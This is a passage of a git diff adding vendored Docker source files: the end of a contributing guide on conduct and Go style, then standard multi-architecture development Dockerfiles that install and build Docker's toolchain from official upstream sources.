Instead of sending an email, GitHub mentions should be + used to ping maintainers to review a pull request, a proposal or an + issue. + +### Guideline violations — 3 strikes method + +The point of this section is not to find opportunities to punish people, but we +do need a fair way to deal with people who are making our community suck. + +1. First occurrence: We'll give you a friendly, but public reminder that the + behavior is inappropriate according to our guidelines. + +2. Second occurrence: We will send you a private message with a warning that + any additional violations will result in removal from the community. + +3. Third occurrence: Depending on the violation, we may need to delete or ban + your account. + +**Notes:** + +* Obvious spammers are banned on first occurrence. If we don't do this, we'll + have spam all over the place. + +* Violations are forgiven after 6 months of good behavior, and we won't hold a + grudge. + +* People who commit minor infractions will get some education, rather than + hammering them in the 3 strikes process. + +* The rules apply equally to everyone in the community, no matter how much + you've contributed. + +* Extreme violations of a threatening, abusive, destructive or illegal nature + will be addressed immediately and are not subject to 3 strikes or forgiveness. + +* Contact abuse@docker.com to report abuse or appeal violations. In the case of + appeals, we know that mistakes happen, and we'll work with you to come up with a + fair solution if there has been a misunderstanding. + +## Coding Style + +Unless explicitly stated, we follow all coding guidelines from the Go +community. While some of these standards may seem arbitrary, they somehow seem +to result in a solid, consistent codebase. + +It is possible that the code base does not currently comply with these +guidelines. We are not looking for a massive PR that fixes this, since that +goes against the spirit of the guidelines. 
All new contributions should make a +best effort to clean up and make the code base better than they left it. +Obviously, apply your best judgement. Remember, the goal here is to make the +code base easier for humans to navigate and understand. Always keep that in +mind when nudging others to comply. + +The rules: + +1. All code should be formatted with `gofmt -s`. +2. All code should pass the default levels of + [`golint`](https://github.com/golang/lint). +3. All code should follow the guidelines covered in [Effective + Go](http://golang.org/doc/effective_go.html) and [Go Code Review + Comments](https://github.com/golang/go/wiki/CodeReviewComments). +4. Comment the code. Tell us the why, the history and the context. +5. Document _all_ declarations and methods, even private ones. Declare + expectations, caveats and anything else that may be important. If a type + gets exported, having the comments already there will ensure it's ready. +6. Variable name length should be proportional to its context and no longer. + `noCommaALongVariableNameLikeThisIsNotMoreClearWhenASimpleCommentWouldDo`. + In practice, short methods will have short variable names and globals will + have longer names. +7. No underscores in package names. If you need a compound name, step back, + and re-examine why you need a compound name. If you still think you need a + compound name, lose the underscore. +8. No utils or helpers packages. If a function is not general enough to + warrant its own package, it has not been written generally enough to be a + part of a util package. Just leave it unexported and well-documented. +9. All tests should run with `go test` and outside tooling should not be + required. No, we don't need another unit testing framework. Assertion + packages are acceptable if they provide _real_ incremental value. +10. Even though we call these "rules" above, they are actually just + guidelines. Since you've read all the rules, you now know that. 
+ +If you are having trouble getting into the mood of idiomatic Go, we recommend +reading through [Effective Go](https://golang.org/doc/effective_go.html). The +[Go Blog](https://blog.golang.org) is also a great resource. Drinking the +kool-aid is a lot easier than going thirsty. diff --git a/vendor/github.com/docker/docker/Dockerfile b/vendor/github.com/docker/docker/Dockerfile new file mode 100644 index 0000000000..ce2d702807 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile @@ -0,0 +1,246 @@ +# This file describes the standard way to build Docker, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# # Publish a release: +# docker run --privileged \ +# -e AWS_S3_BUCKET=baz \ +# -e AWS_ACCESS_KEY=foo \ +# -e AWS_SECRET_KEY=bar \ +# -e GPG_PASSPHRASE=gloubiboulga \ +# docker hack/release.sh +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. 
+# + +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Add zfs ppa +RUN apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 \ + || apt-key adv --keyserver hkp://pgp.mit.edu:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 +RUN echo deb http://ppa.launchpad.net/zfs-native/stable/ubuntu trusty main > /etc/apt/sources.list.d/zfs.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + apt-utils \ + aufs-tools \ + automake \ + bash-completion \ + binutils-mingw-w64 \ + bsdmainutils \ + btrfs-tools \ + build-essential \ + clang \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + gcc-mingw-w64 \ + git \ + iptables \ + jq \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libnl-3-dev \ + libprotobuf-c0-dev \ + libprotobuf-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + net-tools \ + pkg-config \ + protobuf-compiler \ + protobuf-c-compiler \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + ubuntu-zfs \ + xfsprogs \ + vim-common \ + libzfs-dev \ + tar \ + zip \ + --no-install-recommends \ + && pip install awscli==1.10.15 +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Configure the container for OSX cross compilation +ENV OSX_SDK MacOSX10.11.sdk +ENV OSX_CROSS_COMMIT 
a9317c18a3a457ca0a657f08cc4d0d43c6cf8953 +RUN set -x \ + && export OSXCROSS_PATH="/osxcross" \ + && git clone https://github.com/tpoechtrager/osxcross.git $OSXCROSS_PATH \ + && ( cd $OSXCROSS_PATH && git checkout -q $OSX_CROSS_COMMIT) \ + && curl -sSL https://s3.dockerproject.org/darwin/v2/${OSX_SDK}.tar.xz -o "${OSXCROSS_PATH}/tarballs/${OSX_SDK}.tar.xz" \ + && UNATTENDED=yes OSX_VERSION_MIN=10.6 ${OSXCROSS_PATH}/build.sh +ENV PATH /osxcross/target/bin:$PATH + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install Go +# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines +# will need updating, to avoid errors. Ping #docker-maintainers on IRC +# with a heads-up. 
+ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Compile Go for cross compilation +ENV DOCKER_CROSSPLATFORMS \ + linux/386 linux/arm \ + darwin/amd64 \ + freebsd/amd64 freebsd/386 freebsd/arm \ + windows/amd64 windows/386 \ + solaris/amd64 + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install CRIU for checkpoint/restore support +ENV CRIU_VERSION 2.2 +RUN mkdir -p /usr/src/criu \ + && curl -sSL https://github.com/xemul/criu/archive/v${CRIU_VERSION}.tar.gz | tar -v -C /usr/src/criu/ -xz --strip-components=1 \ + && cd /usr/src/criu \ + && make \ + && make install-criu + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. 
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Install yamllint for validating swagger.yaml +RUN pip install yamllint==1.5.0 + +# Install go-swagger for validating swagger.yaml +ENV GO_SWAGGER_COMMIT c28258affb0b6251755d92489ef685af8d4ff3eb +RUN git clone 
https://github.com/go-swagger/go-swagger.git /go/src/github.com/go-swagger/go-swagger \ + && (cd /go/src/github.com/go-swagger/go-swagger && git checkout -q $GO_SWAGGER_COMMIT) \ + && go install -v github.com/go-swagger/go-swagger/cmd/swagger + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc +# Add integration helps to bashrc +RUN echo "source $PWD/hack/make/.integration-test-helpers" >> /etc/bash.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + buildpack-deps:jessie@sha256:25785f89240fbcdd8a74bdaf30dd5599a9523882c6dfc567f2e9ef7cf6f79db6 \ + busybox:latest@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 \ + debian:jessie@sha256:f968f10b4b523737e253a97eac59b0d1420b5c19b69928d35801a6373ffe330e \ + hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. 
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy bindata + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.aarch64 b/vendor/github.com/docker/docker/Dockerfile.aarch64 new file mode 100644 index 0000000000..6112f802f7 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.aarch64 @@ -0,0 +1,175 @@ +# This file describes the standard way to build Docker on aarch64, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.aarch64 . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. 
+# + +FROM aarch64/ubuntu:wily + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + g++ \ + gcc \ + git \ + iptables \ + jq \ + libapparmor-dev \ + libc6-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-dev \ + mercurial \ + net-tools \ + parallel \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + gccgo \ + iproute2 \ + iputils-ping \ + vim-common \ + --no-install-recommends + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support aarch64 properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" 
+ +# Install Go +# We don't have official binary tarballs for ARM64, eigher for Go or bootstrap, +# so we use gccgo as bootstrap to build Go from source code. +# We don't use the official ARMv6 released binaries as a GOROOT_BOOTSTRAP, because +# not all ARM64 platforms support 32-bit mode. 32-bit mode is optional for ARMv8. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH /usr/src/go/bin:$PATH +ENV GOPATH /go + +# Only install one version of the registry, because old version which support +# schema1 manifests is not working on ARM64, we should skip integration-cli +# tests for schema1 manifests on ARM64. +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we 
can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + aarch64/buildpack-deps:jessie@sha256:6aa1d6910791b7ac78265fd0798e5abd6cb3f27ae992f6f960f6c303ec9535f2 \ + aarch64/busybox:latest@sha256:b23a6a37cf269dff6e46d2473b6e227afa42b037e6d23435f1d2bc40fc8c2828 \ + aarch64/debian:jessie@sha256:4be74a41a7c70ebe887b634b11ffe516cf4fcd56864a54941e56bb49883c3170 \ + aarch64/hello-world:latest@sha256:65a4a158587b307bb02db4de41b836addb0c35175bdc801367b1ac1ddeb9afda +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. 
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.armhf b/vendor/github.com/docker/docker/Dockerfile.armhf new file mode 100644 index 0000000000..1aebc166b3 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.armhf @@ -0,0 +1,182 @@ +# This file describes the standard way to build Docker on ARMv7, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.armhf . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. 
+# + +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + createrepo \ + curl \ + cmake \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends \ + && pip install awscli==1.10.15 + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install Go +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# We're building for armhf, which is ARMv7, so let's be explicit about that +ENV GOARCH arm +ENV GOARM 7 + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone 
https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT cb08de17d74bef86ce6c5abe8b240e282f5750be +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git 
"$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. 
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + armhf/buildpack-deps:jessie@sha256:ca6cce8e5bf5c952129889b5cc15cd6aa8d995d77e55e3749bbaadae50e476cb \ + armhf/busybox:latest@sha256:d98a7343ac750ffe387e3d514f8521ba69846c216778919b01414b8617cfb3d4 \ + armhf/debian:jessie@sha256:4a2187483f04a84f9830910fe3581d69b3c985cc045d9f01d8e2f3795b28107b \ + armhf/hello-world:latest@sha256:161dcecea0225975b2ad5f768058212c1e0d39e8211098666ffa1ac74cfb7791 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.ppc64le b/vendor/github.com/docker/docker/Dockerfile.ppc64le new file mode 100644 index 0000000000..1f9f5006ff --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.ppc64le @@ -0,0 +1,188 @@ +# This file describes the standard way to build Docker on ppc64le, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.ppc64le . 
+# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM ppc64le/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support ppc64le properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See 
